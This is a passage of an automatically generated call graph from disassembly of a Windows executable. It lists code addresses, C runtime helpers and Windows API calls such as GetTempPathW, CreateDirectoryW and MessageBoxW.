16807->16808 16808->16731 16810 7ff67d01e898 memcpy_s 16809->16810 16811 7ff67d014a00 45 API calls 16810->16811 16812 7ff67d01e952 memcpy_s __scrt_get_show_window_mode 16810->16812 16811->16812 16812->16736 16814 7ff67d01e5eb 16813->16814 16818 7ff67d01e638 memcpy_s 16813->16818 16815 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16814->16815 16816 7ff67d01e617 16815->16816 16816->16736 16817 7ff67d01e6a3 16819 7ff67d01ab3c __std_exception_copy 37 API calls 16817->16819 16818->16817 16820 7ff67d014a00 45 API calls 16818->16820 16823 7ff67d01e6e5 memcpy_s 16819->16823 16820->16817 16821 7ff67d01afc4 _wfindfirst32i64 17 API calls 16822 7ff67d01e790 16821->16822 16823->16821 16825 7ff67d010f81 16824->16825 16826 7ff67d010f93 16824->16826 16827 7ff67d0155c4 _findclose 11 API calls 16825->16827 16829 7ff67d010fa0 16826->16829 16832 7ff67d010fdd 16826->16832 16828 7ff67d010f86 16827->16828 16830 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 16828->16830 16831 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16829->16831 16836 7ff67d010f91 16830->16836 16831->16836 16833 7ff67d011086 16832->16833 16834 7ff67d0155c4 _findclose 11 API calls 16832->16834 16835 7ff67d0155c4 _findclose 11 API calls 16833->16835 16833->16836 16837 7ff67d01107b 16834->16837 16838 7ff67d011130 16835->16838 16836->16579 16839 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 16837->16839 16840 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 16838->16840 16839->16833 16840->16836 16842 7ff67d01e091 16841->16842 16844 7ff67d014a3f 16841->16844 16843 7ff67d023a74 45 API calls 16842->16843 16842->16844 16843->16844 16845 7ff67d01e0e4 16844->16845 16846 7ff67d01e0fd 16845->16846 16847 7ff67d014a4f 16845->16847 16846->16847 16848 7ff67d022dc0 45 API calls 16846->16848 16847->16579 16848->16847 16856 7ff67d01546c EnterCriticalSection 16849->16856 16858 7ff67d0028ac 16857->16858 16859 7ff67d014bc4 49 API calls 16858->16859 16860 7ff67d0028fd 16859->16860 16861 7ff67d0155c4 _findclose 11 API calls 16860->16861 16862 7ff67d002902 16861->16862 16876 7ff67d0155e4 16862->16876 16865 7ff67d001ef0 49 API calls 16866 7ff67d002931 __scrt_get_show_window_mode 16865->16866 16867 7ff67d008be0 57 API calls 16866->16867 16868 7ff67d002966 16867->16868 16869 7ff67d0029a3 MessageBoxA 16868->16869 16870 7ff67d00296b 16868->16870 16871 7ff67d0029bd 16869->16871 16872 7ff67d008be0 57 API calls 16870->16872 16873 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16871->16873 16874 7ff67d002985 MessageBoxW 16872->16874 16875 7ff67d0029cd 16873->16875 16874->16871 16875->16247 16877 7ff67d01b988 _findclose 11 API calls 16876->16877 16878 7ff67d0155fb 16877->16878 16879 7ff67d01f258 _findclose 11 API calls 16878->16879 16882 7ff67d01563b 16878->16882 16885 7ff67d002909 16878->16885 16880 7ff67d015630 16879->16880 16881 7ff67d01b00c __free_lconv_mon 11 API calls 16880->16881 16881->16882 16882->16885 16888 7ff67d01f928 16882->16888 16885->16865 16886 7ff67d01afc4 _wfindfirst32i64 17 API calls 16887 7ff67d015680 16886->16887 16892 7ff67d01f945 16888->16892 16889 7ff67d01f94a 16890 7ff67d015661 16889->16890 16891 7ff67d0155c4 _findclose 11 API calls 16889->16891 16890->16885 16890->16886 16893 7ff67d01f954 16891->16893 16892->16889 16892->16890 16895 7ff67d01f994 16892->16895 16894 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 16893->16894 16894->16890 16895->16890 16896 7ff67d0155c4 _findclose 11 API calls 16895->16896 16896->16893 16898 7ff67d008d82 WideCharToMultiByte 16897->16898 16899 7ff67d008d14 WideCharToMultiByte 16897->16899 16900 7ff67d008daf 16898->16900 16907 7ff67d003f35 16898->16907 16901 7ff67d008d3e 16899->16901 16902 7ff67d008d55 16899->16902 16903 7ff67d0029e0 57 API calls 16900->16903 16904 7ff67d0029e0 57 API calls 16901->16904 16902->16898 16905 7ff67d008d6b 16902->16905 16903->16907 16904->16907 16906 7ff67d0029e0 57 API calls 16905->16906 16906->16907 16907->16256 16907->16258 16909 7ff67d01aab3 16908->16909 16912 7ff67d007bee 16908->16912 16910 7ff67d01ab3c __std_exception_copy 37 API calls 16909->16910 16909->16912 16911 7ff67d01aae0 16910->16911 16911->16912 16913 7ff67d01afc4 _wfindfirst32i64 17 API calls 16911->16913 16912->16274 16914 7ff67d01ab10 16913->16914 16916 7ff67d003fe0 116 API calls 16915->16916 16917 7ff67d001ad6 16916->16917 16918 7ff67d001c84 16917->16918 16920 7ff67d0082c0 83 API calls 16917->16920 16919 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16918->16919 16922 7ff67d001c98 16919->16922 16921 7ff67d001b0e 16920->16921 16946 7ff67d001b3f 16921->16946 16954 7ff67d010914 16921->16954 16922->16284 16948 7ff67d003e50 16922->16948 16924 7ff67d01028c 74 API calls 16924->16918 16925 7ff67d001b28 16926 7ff67d001b44 16925->16926 16927 7ff67d001b2c 16925->16927 16958 7ff67d0105dc 16926->16958 16928 7ff67d002890 59 API calls 16927->16928 16928->16946 16931 7ff67d001b5f 16933 7ff67d002890 59 API calls 16931->16933 16932 7ff67d001b77 16934 7ff67d010914 73 API calls 16932->16934 16933->16946 16935 7ff67d001bc4 16934->16935 16936 7ff67d001bee 16935->16936 16937 7ff67d001bd6 16935->16937 16939 7ff67d0105dc _fread_nolock 53 API calls 16936->16939 16938 7ff67d002890 59 API calls 16937->16938 16938->16946 16940 7ff67d001c03 16939->16940 16941 7ff67d001c1e 16940->16941 16942 7ff67d001c09 16940->16942 16961 7ff67d010350 16941->16961 16943 7ff67d002890 59 API calls 16942->16943 16943->16946 16946->16924 16947 7ff67d002b30 59 API calls 16947->16946 16949 7ff67d001ef0 49 API calls 16948->16949 16950 7ff67d003e6d 16949->16950 16950->16294 16952 7ff67d001ef0 49 API calls 16951->16952 16953 7ff67d004090 16952->16953 16953->16284 16955 7ff67d010944 16954->16955 16967 7ff67d0106a4 16955->16967 16957 7ff67d01095d 16957->16925 16979 7ff67d0105fc 16958->16979 16962 7ff67d010359 16961->16962 16963 7ff67d001c32 16961->16963 16964 7ff67d0155c4 _findclose 11 API calls 16962->16964 16963->16946 16963->16947 16965 7ff67d01035e 16964->16965 16966 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 16965->16966 16966->16963 16968 7ff67d01070e 16967->16968 16969 7ff67d0106ce 16967->16969 16968->16969 16971 7ff67d01071a 16968->16971 16970 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16969->16970 16973 7ff67d0106f5 16970->16973 16978 7ff67d01546c EnterCriticalSection 16971->16978 16973->16957 16980 7ff67d010626 16979->16980 16991 7ff67d001b59 16979->16991 16981 7ff67d010672 16980->16981 16982 7ff67d010635 __scrt_get_show_window_mode 16980->16982 16980->16991 16992 7ff67d01546c EnterCriticalSection 16981->16992 16984 7ff67d0155c4 _findclose 11 API calls 16982->16984 16986 7ff67d01064a 16984->16986 16988 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 16986->16988 16988->16991 16991->16931 16991->16932 16994 7ff67d00869f GetTokenInformation 16993->16994 16996 7ff67d008721 __std_exception_destroy 16993->16996 16995 7ff67d0086c0 GetLastError 16994->16995 16997 7ff67d0086cb 16994->16997 16995->16996 16995->16997 16998 7ff67d00873a 16996->16998 16999 7ff67d008734 CloseHandle 16996->16999 16997->16996 17000 7ff67d0086e7 GetTokenInformation 16997->17000 16998->16303 16999->16998 17000->16996 17001 7ff67d00870a 17000->17001 17001->16996 17002 7ff67d008714 ConvertSidToStringSidW 17001->17002 17002->16996 17004 7ff67d008775 17003->17004 17020 7ff67d014e18 17004->17020 17008 7ff67d002c70 17007->17008 17009 7ff67d014bc4 49 API calls 17008->17009 17010 7ff67d002cbb __scrt_get_show_window_mode 17009->17010 17011 7ff67d008be0 57 API calls 17010->17011 17012 7ff67d002cf0 17011->17012 17013 7ff67d002cf5 17012->17013 17014 7ff67d002d2d MessageBoxA 17012->17014 17015 7ff67d008be0 57 API calls 17013->17015 17016 7ff67d002d47 17014->17016 17017 7ff67d002d0f MessageBoxW 17015->17017 17018 7ff67d00bdc0 _wfindfirst32i64 8 API calls 17016->17018 17017->17016 17019 7ff67d002d57 17018->17019 17019->16313 17021 7ff67d014e72 17020->17021 17022 7ff67d014e97 17021->17022 17024 7ff67d014ed3 17021->17024 17023 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 17022->17023 17026 7ff67d014ec1 17023->17026 17038 7ff67d0131d0 17024->17038 17028 7ff67d00bdc0 _wfindfirst32i64 8 API calls 17026->17028 17027 7ff67d014fb4 17029 7ff67d01b00c __free_lconv_mon 11 API calls 17027->17029 17030 7ff67d008798 17028->17030 17029->17026 17030->16310 17032 7ff67d014f89 17035 7ff67d01b00c __free_lconv_mon 11 API calls 17032->17035 17033 7ff67d014fda 17033->17027 17034 7ff67d014fe4 17033->17034 17037 7ff67d01b00c __free_lconv_mon 11 API calls 17034->17037 17035->17026 17036 7ff67d014f80 17036->17027 17036->17032 17037->17026 17039 7ff67d01320e 17038->17039 17040 7ff67d0131fe 17038->17040 17041 7ff67d013217 17039->17041 17046 7ff67d013245 17039->17046 17043 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 17040->17043 17044 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 17041->17044 17042 7ff67d01323d 17042->17027 17042->17032 17042->17033 17042->17036 17043->17042 17044->17042 17046->17040 17046->17042 17049 7ff67d013be4 17046->17049 17082 7ff67d013630 17046->17082 17119 7ff67d012dc0 17046->17119 17050 7ff67d013c26 17049->17050 17051 7ff67d013c97 17049->17051 17052 7ff67d013c2c 17050->17052 17053 7ff67d013cc1 17050->17053 17054 7ff67d013c9c 17051->17054 17055 7ff67d013cf0 17051->17055 17056 7ff67d013c60 17052->17056 17057 7ff67d013c31 17052->17057 17138 7ff67d011f94 17053->17138 17058 7ff67d013c9e 17054->17058 17059 7ff67d013cd1 17054->17059 17061 7ff67d013d07 17055->17061 17063 7ff67d013cfa 17055->17063 17067 7ff67d013cff 17055->17067 17064 7ff67d013c37 17056->17064 17056->17067 17057->17061 17057->17064 17062 7ff67d013c40 17058->17062 17071 7ff67d013cad 17058->17071 17145 7ff67d011b84 17059->17145 17152 7ff67d0148ec 17061->17152 17080 7ff67d013d30 17062->17080 17122 7ff67d014398 17062->17122 17063->17053 17063->17067 17064->17062 17070 7ff67d013c72 17064->17070 17077 7ff67d013c5b 17064->17077 17067->17080 17156 7ff67d0123a4 17067->17156 17070->17080 17132 7ff67d0146d4 17070->17132 17071->17053 17072 7ff67d013cb2 17071->17072 17076 7ff67d014798 37 API calls 17072->17076 17072->17080 17074 7ff67d00bdc0 _wfindfirst32i64 8 API calls 17075 7ff67d01402a 17074->17075 17075->17046 17076->17077 17078 7ff67d014a00 45 API calls 17077->17078 17077->17080 17081 7ff67d013f1c 17077->17081 17078->17081 17080->17074 17081->17080 17163 7ff67d01f0c8 17081->17163 17083 7ff67d01363e 17082->17083 17084 7ff67d013654 17082->17084 17086 7ff67d013c26 17083->17086 17087 7ff67d013c97 17083->17087 17092 7ff67d013694 17083->17092 17085 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 17084->17085 17084->17092 17085->17092 17088 7ff67d013c2c 17086->17088 17089 7ff67d013cc1 17086->17089 17090 7ff67d013c9c 17087->17090 17091 7ff67d013cf0 17087->17091 17093 7ff67d013c60 17088->17093 17094 7ff67d013c31 17088->17094 17097 7ff67d011f94 38 API calls 17089->17097 17095 7ff67d013c9e 17090->17095 17096 7ff67d013cd1 17090->17096 17098 7ff67d013d07 17091->17098 17099 7ff67d013cfa 17091->17099 17103 7ff67d013cff 17091->17103 17092->17046 17100 7ff67d013c37 17093->17100 17093->17103 17094->17098 17094->17100 17107 7ff67d013cad 17095->17107 17111 7ff67d013c40 17095->17111 17101 7ff67d011b84 38 API calls 17096->17101 17115 7ff67d013c5b 17097->17115 17104 7ff67d0148ec 45 API calls 17098->17104 17099->17089 17099->17103 17105 7ff67d013c72 17100->17105 17100->17111 17100->17115 17101->17115 17102 7ff67d014398 47 API calls 17102->17115 17106 7ff67d0123a4 38 API calls 17103->17106 17117 7ff67d013d30 17103->17117 17104->17115 17108 7ff67d0146d4 46 API calls 17105->17108 17105->17117 17106->17115 17107->17089 17109 7ff67d013cb2 17107->17109 17108->17115 17113 7ff67d014798 37 API calls 17109->17113 17109->17117 17110 7ff67d00bdc0 _wfindfirst32i64 8 API calls 17112 7ff67d01402a 17110->17112 17111->17102 17111->17117 17112->17046 17113->17115 17114 7ff67d014a00 45 API calls 17118 7ff67d013f1c 17114->17118 17115->17114 17115->17117 17115->17118 17116 7ff67d01f0c8 46 API calls 17116->17118 17117->17110 17118->17116 17118->17117 17194 7ff67d011208 17119->17194 17123 7ff67d0143be 17122->17123 17124 7ff67d010dc0 12 API calls 17123->17124 17125 7ff67d01440e 17124->17125 17126 7ff67d01ec30 46 API calls 17125->17126 17128 7ff67d0144e1 17126->17128 17127 7ff67d014503 17130 7ff67d014591 17127->17130 17131 7ff67d014a00 45 API calls 17127->17131 17128->17127 17129 7ff67d014a00 45 API calls 17128->17129 17129->17127 17130->17077 17131->17130 17135 7ff67d014709 17132->17135 17133 7ff67d01474e 17133->17077 17134 7ff67d014727 17136 7ff67d01f0c8 46 API calls 17134->17136 17135->17133 17135->17134 17137 7ff67d014a00 45 API calls 17135->17137 17136->17133 17137->17134 17139 7ff67d011fc7 17138->17139 17140 7ff67d011ff6 17139->17140 17142 7ff67d0120b3 17139->17142 17144 7ff67d012033 17140->17144 17175 7ff67d010e68 17140->17175 17143 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 17142->17143 17143->17144 17144->17077 17146 7ff67d011bb7 17145->17146 17147 7ff67d011be6 17146->17147 17149 7ff67d011ca3 17146->17149 17148 7ff67d010e68 12 API calls 17147->17148 17151 7ff67d011c23 17147->17151 17148->17151 17150 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 17149->17150 17150->17151 17151->17077 17153 7ff67d01492f 17152->17153 17155 7ff67d014933 __crtLCMapStringW 17153->17155 17183 7ff67d014988 17153->17183 17155->17077 17157 7ff67d0123d7 17156->17157 17158 7ff67d012406 17157->17158 17160 7ff67d0124c3 17157->17160 17159 7ff67d010e68 12 API calls 17158->17159 17162 7ff67d012443 17158->17162 17159->17162 17161 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 17160->17161 17161->17162 17162->17077 17165 7ff67d01f0f9 17163->17165 17173 7ff67d01f107 17163->17173 17164 7ff67d01f127 17167 7ff67d01f138 17164->17167 17168 7ff67d01f15f 17164->17168 17165->17164 17166 7ff67d014a00 45 API calls 17165->17166 17165->17173 17166->17164 17187 7ff67d020b80 17167->17187 17170 7ff67d01f189 17168->17170 17171 7ff67d01f1ea 17168->17171 17168->17173 17170->17173 17174 7ff67d01fd00 _fread_nolock MultiByteToWideChar 17170->17174 17172 7ff67d01fd00 _fread_nolock MultiByteToWideChar 17171->17172 17172->17173 17173->17081 17174->17173 17176 7ff67d010e8e 17175->17176 17177 7ff67d010e9f 17175->17177 17176->17144 17177->17176 17178 7ff67d01dcbc _fread_nolock 12 API calls 17177->17178 17179 7ff67d010ed0 17178->17179 17180 7ff67d010ee4 17179->17180 17181 7ff67d01b00c __free_lconv_mon 11 API calls 17179->17181 17182 7ff67d01b00c __free_lconv_mon 11 API calls 17180->17182 17181->17180 17182->17176 17184 7ff67d0149a6 17183->17184 17185 7ff67d0149ae 17183->17185 17186 7ff67d014a00 45 API calls 17184->17186 17185->17155 17186->17185 17190 7ff67d0277e0 17187->17190 17195 7ff67d01123d 17194->17195 17196 7ff67d01124f 17194->17196 17198 7ff67d0155c4 _findclose 11 API calls 17195->17198 17197 7ff67d011299 17196->17197 17200 7ff67d01125d 17196->17200 17203 7ff67d011615 17197->17203 17204 7ff67d0155c4 _findclose 11 API calls 17197->17204 17199 7ff67d011242 17198->17199 17201 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 17199->17201 17202 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 17200->17202 17210 7ff67d01124d 17201->17210 17202->17210 17205 7ff67d0155c4 _findclose 11 API calls 17203->17205 17203->17210 17207 7ff67d01160a 17204->17207 17206 7ff67d0118a9 17205->17206 17208 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 17206->17208 17209 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 17207->17209 17208->17210 17209->17203 17210->17046 17212 7ff67d007976 17211->17212 17213 7ff67d0079ed GetTempPathW 17212->17213 17214 7ff67d00799a 17212->17214 17215 7ff67d007a02 17213->17215 17216 7ff67d007b70 61 API calls 17214->17216 17250 7ff67d002830 17215->17250 17217 7ff67d0079a6 17216->17217 17262 7ff67d007430 17217->17262 17223 7ff67d00bdc0 _wfindfirst32i64 8 API calls 17226 7ff67d00154f 17223->17226 17224 7ff67d007a1b __std_exception_destroy 17228 7ff67d007ac6 17224->17228 17233 7ff67d007a51 17224->17233 17254 7ff67d018ba4 17224->17254 17257 7ff67d008b80 17224->17257 17226->16317 17226->16321 17230 7ff67d008cf0 59 API calls 17228->17230 17234 7ff67d007ad7 __std_exception_destroy 17230->17234 17235 7ff67d008be0 57 API calls 17233->17235 17249 7ff67d007a8a __std_exception_destroy 17233->17249 17237 7ff67d008be0 57 API calls 17234->17237 17234->17249 17236 7ff67d007a67 17235->17236 17238 7ff67d007a6c 17236->17238 17239 7ff67d007aa9 SetEnvironmentVariableW 17236->17239 17240 7ff67d007af5 17237->17240 17241 7ff67d008be0 57 API calls 17238->17241 17239->17249 17249->17223 17251 7ff67d002855 17250->17251 17252 7ff67d014e18 48 API calls 17251->17252 17253 7ff67d002874 17252->17253 17253->17224 17296 7ff67d0187d0 17254->17296 17258 7ff67d008ba6 CreateDirectoryW 17257->17258 17259 7ff67d008b90 17257->17259 17258->17224 17260 7ff67d002c50 59 API calls 17259->17260 17261 7ff67d008b9c 17260->17261 17261->17224 17263 7ff67d00743c 17262->17263 17264 7ff67d008be0 57 API calls 17263->17264 17265 7ff67d00745e 17264->17265 17266 7ff67d007479 ExpandEnvironmentStringsW 17265->17266 17267 7ff67d007466 17265->17267 17269 7ff67d00749f __std_exception_destroy 17266->17269 17268 7ff67d002b30 59 API calls 17267->17268 17277 7ff67d007472 17268->17277 17270 7ff67d0074a3 17269->17270 17271 7ff67d0074b6 17269->17271 17273 7ff67d002b30 59 API calls 17270->17273 17275 7ff67d0074c4 17271->17275 17276 7ff67d0074d0 17271->17276 17272 7ff67d00bdc0 _wfindfirst32i64 8 API calls 17274 7ff67d007598 17272->17274 17273->17277 17274->17249 17422 7ff67d017aa4 17275->17422 17429 7ff67d016428 17276->17429 17277->17272 17337 7ff67d021cc8 17296->17337 17396 7ff67d021a40 17337->17396 17417 7ff67d020db8 EnterCriticalSection 17396->17417 17530 7ff67d00173e 17529->17530 17531 7ff67d001726 17529->17531 17533 7ff67d001744 17530->17533 17534 7ff67d001768 17530->17534 17532 7ff67d002b30 59 API calls 17531->17532 17535 7ff67d001732 17532->17535 17659 7ff67d0012b0 17533->17659 17622 7ff67d007c20 17534->17622 17535->16345 17540 7ff67d00175f 17540->16345 17541 7ff67d00178d 17543 7ff67d002890 59 API calls 17541->17543 17542 7ff67d0017b9 17544 7ff67d003fe0 116 API calls 17542->17544 17546 7ff67d0017a3 17543->17546 17547 7ff67d0017ce 17544->17547 17545 7ff67d002b30 59 API calls 17545->17540 17546->16345 17548 7ff67d0017ee 17547->17548 17549 7ff67d0017d6 17547->17549 17551 7ff67d010914 73 API calls 17548->17551 17550 7ff67d002b30 59 API calls 17549->17550 17552 7ff67d0017e5 17550->17552 17553 7ff67d0017ff 17551->17553 17557 7ff67d01028c 74 API calls 17552->17557 17554 7ff67d001823 17553->17554 17555 7ff67d001803 17553->17555 17558 7ff67d001841 17554->17558 17559 7ff67d001829 17554->17559 17556 7ff67d002890 59 API calls 17555->17556 17565 7ff67d001819 __std_exception_destroy 17556->17565 17561 7ff67d001937 17557->17561 17562 7ff67d001863 17558->17562 17570 7ff67d001882 17558->17570 17641 7ff67d001050 17559->17641 17561->16345 17564 7ff67d002890 59 API calls 17562->17564 17563 7ff67d01028c 74 API calls 17563->17552 17564->17565 17565->17563 17566 7ff67d0105dc _fread_nolock 53 API calls 17566->17570 17567 7ff67d0018e5 17570->17565 17570->17566 17570->17567 17698 7ff67d010d1c 17570->17698 17572 7ff67d002d86 17571->17572 17573 7ff67d001ef0 49 API calls 17572->17573 17574 7ff67d002db9 17573->17574 17575 7ff67d003e50 49 API calls 17574->17575 17621 7ff67d0030ea 17574->17621 17576 7ff67d002e27 17575->17576 17577 7ff67d003e50 49 API calls 17576->17577 17578 7ff67d002e38 17577->17578 17579 7ff67d002e95 17578->17579 17580 7ff67d002e59 17578->17580 17582 7ff67d0031b0 75 API calls 17579->17582 17781 7ff67d0031b0 17580->17781 17583 7ff67d002e93 17582->17583 17584 7ff67d002ed4 17583->17584 17585 7ff67d002f16 17583->17585 17789 7ff67d0075b0 17584->17789 17586 7ff67d0031b0 75 API calls 17585->17586 17588 7ff67d002f40 17586->17588 17592 7ff67d0031b0 75 API calls 17588->17592 17597 7ff67d002fdc 17588->17597 17590 7ff67d003171 17599 7ff67d002b30 59 API calls 17590->17599 17595 7ff67d002f72 17592->17595 17595->17597 17600 7ff67d0031b0 75 API calls 17595->17600 17596 7ff67d001eb0 59 API calls 17598 7ff67d00302f 17596->17598 17597->17596 17613 7ff67d0030ef 17597->17613 17603 7ff67d001ef0 49 API calls 17598->17603 17598->17621 17599->17621 17602 7ff67d002fa0 17600->17602 17602->17597 17605 7ff67d002fa4 17602->17605 17606 7ff67d003057 17603->17606 17607 7ff67d002b30 59 API calls 17605->17607 17606->17590 17609 7ff67d001ef0 49 API calls 17606->17609 17608 7ff67d002b30 59 API calls 17614 7ff67d003148 17608->17614 17613->17614 17826 7ff67d015170 17613->17826 17614->17590 17614->17608 17616 7ff67d001710 135 API calls 17614->17616 17616->17614 17623 7ff67d007c30 17622->17623 17624 7ff67d001ef0 49 API calls 17623->17624 17625 7ff67d007c71 17624->17625 17640 7ff67d007cf1 17625->17640 17702 7ff67d003f70 17625->17702 17627 7ff67d00bdc0 _wfindfirst32i64 8 API calls 17628 7ff67d001785 17627->17628 17628->17541 17628->17542 17629 7ff67d007d2b 17708 7ff67d0077d0 17629->17708 17632 7ff67d007b70 61 API calls 17637 7ff67d007ca2 __std_exception_destroy 17632->17637 17634 7ff67d007ce0 17638 7ff67d002c50 59 API calls 17634->17638 17635 7ff67d007d14 17636 7ff67d002c50 59 API calls 17635->17636 17636->17629 17637->17634 17637->17635 17638->17640 17640->17627 17642 7ff67d0010a6 17641->17642 17660 7ff67d0012c2 17659->17660 17661 7ff67d003fe0 116 API calls 17660->17661 17662 7ff67d0012f2 17661->17662 17663 7ff67d001311 17662->17663 17664 7ff67d0012fa 17662->17664 17666 7ff67d010914 73 API calls 17663->17666 17665 7ff67d002b30 59 API calls 17664->17665 17672 7ff67d00130a __std_exception_destroy 17665->17672 17667 7ff67d001323 17666->17667 17668 7ff67d00134d 17667->17668 17669 7ff67d001327 17667->17669 17674 7ff67d001390 17668->17674 17675 7ff67d001368 17668->17675 17670 7ff67d002890 59 API calls 17669->17670 17671 7ff67d00133e 17670->17671 17673 7ff67d01028c 74 API calls 17671->17673 17676 7ff67d00bdc0 _wfindfirst32i64 8 API calls 17672->17676 17673->17672 17679 7ff67d0013aa 17674->17679 17690 7ff67d001463 17674->17690 17678 7ff67d002890 59 API calls 17675->17678 17677 7ff67d001454 17676->17677 17677->17540 17677->17545 17681 7ff67d001383 17678->17681 17682 7ff67d001050 98 API calls 17679->17682 17680 7ff67d0013c3 17683 7ff67d01028c 74 API calls 17680->17683 17684 7ff67d01028c 74 API calls 17681->17684 17685 7ff67d0013bb 17682->17685 17686 7ff67d0013cf 17683->17686 17684->17672 17685->17680 17688 7ff67d0014d2 __std_exception_destroy 17685->17688 17689 7ff67d0077d0 64 API calls 17686->17689 17687 7ff67d0105dc _fread_nolock 53 API calls 17687->17690 17694 7ff67d01028c 74 API calls 17688->17694 17691 7ff67d0013de 17689->17691 17690->17680 17690->17687 17692 7ff67d0014bb 17690->17692 17691->17672 17695 7ff67d001ef0 49 API calls 17691->17695 17693 7ff67d002890 59 API calls 17692->17693 17693->17688 17694->17672 17696 7ff67d00140c 17695->17696 17696->17672 17703 7ff67d003f7a 17702->17703 17704 7ff67d008be0 57 API calls 17703->17704 17705 7ff67d003fa2 17704->17705 17706 7ff67d00bdc0 _wfindfirst32i64 8 API calls 17705->17706 17707 7ff67d003fca 17706->17707 17707->17629 17707->17632 17707->17637 17709 7ff67d0077e0 17708->17709 17710 7ff67d001ef0 49 API calls 17709->17710 17711 7ff67d007811 17710->17711 17712 7ff67d007929 17711->17712 17713 7ff67d001ef0 49 API calls 17711->17713 17714 7ff67d00bdc0 _wfindfirst32i64 8 API calls 17712->17714 17716 7ff67d007838 17713->17716 17716->17712 17782 7ff67d0031e4 17781->17782 17783 7ff67d014bc4 49 API calls 17782->17783 17784 7ff67d00320a 17783->17784 17785 7ff67d00321b 17784->17785 17841 7ff67d015eec 17784->17841 17787 7ff67d00bdc0 _wfindfirst32i64 8 API calls 17785->17787 17788 7ff67d003239 17787->17788 17788->17583 17790 7ff67d0075be 17789->17790 17791 7ff67d003fe0 116 API calls 17790->17791 17792 7ff67d0075ed 17791->17792 17793 7ff67d001ef0 49 API calls 17792->17793 17794 7ff67d007616 17793->17794 17795 7ff67d003f70 57 API calls 17794->17795 17816 7ff67d00761d 17794->17816 17797 7ff67d007630 17795->17797 17796 7ff67d007799 17800 7ff67d01028c 74 API calls 17796->17800 17819 7ff67d007795 17796->17819 17799 7ff67d0076b4 17797->17799 17798 7ff67d0076f9 17800->17819 17816->17796 17816->17798 17827 7ff67d0151aa 17826->17827 17828 7ff67d01517d 17826->17828 17829 7ff67d0151cd 17827->17829 17833 7ff67d0151e9 17827->17833 17830 7ff67d0155c4 _findclose 11 API calls 17828->17830 17831 7ff67d015134 17828->17831 17832 7ff67d0155c4 _findclose 11 API calls 17829->17832 17834 7ff67d015187 17830->17834 17831->17613 17836 7ff67d015098 45 API calls 17833->17836 17842 7ff67d015f09 17841->17842 17843 7ff67d015f15 17841->17843 17858 7ff67d015800 17842->17858 17845 7ff67d015098 45 API calls 17843->17845 17846 7ff67d015f3d 17845->17846 17847 7ff67d015f4d 17846->17847 17848 7ff67d01f4e4 5 API calls 17846->17848 17849 7ff67d015684 14 API calls 17847->17849 17848->17847 17850 7ff67d015fa5 17849->17850 17859 7ff67d015837 17858->17859 17860 7ff67d01581a 17858->17860 17859->17860 17861 7ff67d01584a CreateFileW 17859->17861 17862 7ff67d0155a4 _fread_nolock 11 API calls 17860->17862 17863 7ff67d01587e 17861->17863 17864 7ff67d0158b4 17861->17864 17865 7ff67d01581f 17862->17865 17883 7ff67d015954 GetFileType 17863->17883 17909 7ff67d015ddc 17864->17909 17868 7ff67d0155c4 _findclose 11 API calls 17865->17868 18054 7ff67d0164dc 18053->18054 18055 7ff67d016502 18054->18055 18058 7ff67d016535 18054->18058 18056 7ff67d0155c4 _findclose 11 API calls 18055->18056 18057 7ff67d016507 18056->18057 18059 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 18057->18059 18060 7ff67d016548 18058->18060 18061 7ff67d01653b 18058->18061 18064 7ff67d004039 18059->18064 18072 7ff67d01b2ec 18060->18072 18062 7ff67d0155c4 _findclose 11 API calls 18061->18062 18062->18064 18064->16420 18085 7ff67d020db8 EnterCriticalSection 18072->18085 18433 7ff67d0191a0 18432->18433 18436 7ff67d018c7c 18433->18436 18435 7ff67d0191b9 18435->16430 18437 7ff67d018c97 18436->18437 18438 7ff67d018cc6 18436->18438 18439 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 18437->18439 18446 7ff67d01546c EnterCriticalSection 18438->18446 18441 7ff67d018cb7 18439->18441 18441->18435 18448 7ff67d010083 18447->18448 18450 7ff67d0100b1 18447->18450 18449 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 18448->18449 18451 7ff67d0100a3 18449->18451 18450->18451 18457 7ff67d01546c EnterCriticalSection 18450->18457 18451->16434 18459 7ff67d003fe0 116 API calls 18458->18459 18460 7ff67d0015c7 18459->18460 18461 7ff67d0015f0 18460->18461 18462 7ff67d0015cf 18460->18462 18464 7ff67d010914 73 API calls 18461->18464 18463 7ff67d002b30 59 API calls 18462->18463 18465 7ff67d0015df 18463->18465 18466 7ff67d001601 18464->18466 18465->16439 18467 7ff67d001605 18466->18467 18468 7ff67d001621 18466->18468 18469 7ff67d002890 59 API calls 18467->18469 18470 7ff67d001651 18468->18470 18471 7ff67d001631 18468->18471 18480 7ff67d00161c __std_exception_destroy 18469->18480 18472 7ff67d001666 18470->18472 18478 7ff67d00167d 18470->18478 18474 7ff67d002890 59 API calls 18471->18474 18475 7ff67d001050 98 API calls 18472->18475 18473 7ff67d01028c 74 API calls 18476 7ff67d0016f7 18473->18476 18474->18480 18475->18480 18476->16439 18477 7ff67d0105dc _fread_nolock 53 API calls 18477->18478 18478->18477 18479 7ff67d0016be 18478->18479 18478->18480 18481 7ff67d002890 59 API calls 18479->18481 18480->18473 18481->18480 18484 7ff67d0019d3 18482->18484 18485 7ff67d00196f 18482->18485 18483 7ff67d015170 45 API calls 18483->18485 18484->16451 18485->18483 18485->18484 18487 7ff67d008be0 57 API calls 18486->18487 18488 7ff67d008287 